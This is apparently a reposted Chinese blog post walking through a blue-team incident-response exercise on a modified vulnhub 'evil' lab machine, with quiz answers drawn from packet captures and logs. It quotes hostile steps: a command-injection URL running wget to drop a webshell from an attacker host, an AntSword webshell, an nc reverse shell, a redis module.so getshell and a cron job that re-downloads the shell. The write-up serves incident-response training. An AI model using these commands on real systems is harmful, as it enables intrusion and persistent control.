学习干货|详解一次简单的综合应急响应学习思路

0x01 前言

本次把前面练习的应急响应作为基础，相当于期末复习，做一个简单的模拟，主要是学习思路，靶机原型为vulnhub-evil，其中做了部分改动，以蓝方视角呈现，只作为总结、较为简单、缕清思路，学习的过程及总结的意义远大于所需的结果！

文章结尾会注明攻击者大概思路、不要疑惑为什么有直接的入侵方式还这么麻烦一万个人有一万个人攻击方法，一个站有十个洞肯定是要全都搜集一遍提交，主要是为了学习思路

注: 靶机已上传到平台，已在此前注册过平台的朋友，可云上环境开启体验(题目与当前注明做了部分修改、无大碍)

靶机环境获取: 
https://cloud.189.cn/t/aeYRRfb6ZNNn （访问码：pnt1）

0x02 题目展示

系统信息

系统：Debian 4.19.194Linux账号密码：root/root123镜像扩展名：.OVA

    应急响应-简单综合应急响应说明: 抓取的流量包: result.pcap 在 /result.pcap1.审计日志及流量包，攻击者通过下载的木马文件的源地址是？2.根据流量包特征，远控工具使用的哪个？3.审计流量包，木马文件连接密码是什么？4.审计流量包，攻击者反弹的IP和端口是什么？5.攻击者通过某服务写入了木马，请写出攻击者上传的木马文件名6.写出并分析写入的木马文件内的flag字段7.攻击者在服务器内权限维持请求外部地址和恶意文件的地址 flag{http://xxxxxxxxxx/xx.xxx}

0x03 结果复现

先对流量包进行分析，攻击者先对端口进行了存活探测及端口扫描

在看流量包及web日志，攻击者对web端口扫描了文件目录

在流量包中进行筛选可以判断，后续攻击者对某文件进行fuzz测试命令执行

可以看到攻击者fuzz到command可以成功进行命令执行

问: 审计日志及流量包，攻击者通过下载的木马文件的源地址是？答: 192.168.150.253

对流量包筛选过滤条件后，可以看到攻击者请求下载的shell文件地址

此处wget使用的-o应是-O、此处一处错误、抱歉请求的url为: http://192.168.150.42/secret/evil.php?command=wget http://192.168.150.253:8080/shell.php -O /var/www/html/.shell.php

问: 根据流量包特征，远控工具使用的哪个？答: 蚁剑

再次对流量包过滤请求url，得到详细的请求流量

根据以下流量特征可以判断使用的远控工具为 蚁剑

(1) 连接密码直接暴露 (2) eval函数明显 (3) 多个'_'符号进行分割

问: 审计流量包，木马文件连接密码是什么？答: cmd

对流量包对应条件过滤筛选后，查看.shell.php操作记录

第50962条流量中，攻击者使用 'pwd' 作为密码连接，但是连接失败

后续流量攻击者使用 'cmd' 作为密码进行操作，可以成功执行

问: 审计流量包，攻击者反弹的IP和端口是什么？答: 192.168.150.199:4444

从攻击者视角来看，蚁剑作为伪终端无法进行很多操作，攻击者想要反弹shell进行后续操作，分析流量包可以看出

在报文中，依次按照顺序查看value，取出操作值(base64编码),进行解码

应该是蚁剑特征，会将一段正常的base64编码前加入2位随机字符，删除后转码正常

以上流量中，攻击者进入了根目录操作

在最后一段流量包中，看到攻击者执行了nc反弹shell操作

问: 攻击者通过某服务写入了木马，请写出攻击者上传的木马文件名 答: module.so

在机器中看到了当前开放的业务端口，查看redis服务的版本

查看redis服务的日志 /var/log/redis.log 翻看到相关连接日志

攻击者192.168.150.199连接到redis，上传到根目录下module.so文件，且根据当前redis版本及目前配置，可以判断攻击者使用了redis-getshell

问: 写出并分析写入的木马文件内的flag字段答: XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b

文件为C语言编写的恶意文件，使用IDA打开，查看到相关的敏感信息

问: 攻击者在服务器内权限维持请求外部地址和恶意文件的地址 答: http://192.168.150.199:88/shell.php

攻击者使用redis拿到root权限后，尝试进行权限维持，写入或下载方式放置后门

通过查看 /etc/crontab文件看到，攻击者通过写入定时任务，请求/opt/cron.sh

在cron.sh看到脚本调用wget下载攻击机的shell.php保存到了路径/var/www/html/secret/.shell.php

通过grep命令查看到 /var/www/html/secret/index.php 有相关的定时写入动作(上帝视角)

0x04 总结

攻击者视角:

1. 攻击者前期通过nmap等相关工具扫描端口2. 通过扫描的端口先进行目录探测(即使发现redis)3. 探测到可以命令执行的php文件(原靶机为文件包含)4. 命令执行后以wget的方式下载一句话木马到靶机5. 使用蚁剑连接做系统命令执行操作6. 蚁剑终端所做操作有限，尝试使用系统工具反弹shell7. 反弹到shell后、当前权限低，尝试提权8. 查看系统运行服务及配置后对redis进行getshell9. 通过redis-getshell拿到root权限10. 做权限维持、写入或下载后门木马

当前环境仅为学习所用，一万个人做攻击，一万个人不同的思路，你可以直接用redis拿shell，但是多个漏洞能提交的话，肯定不能漏掉，学习的是某种思路，接触到新的东西，受到N种启发，在当下可能觉得不以为然，可能在以后的某个时候，不经意间，突然在某件事上比着葫芦画瓢的用到了，这就是学习的意义!

原文始发于微信公众号（州弟学安全）：学习干货|详解一次简单的综合应急响应学习思路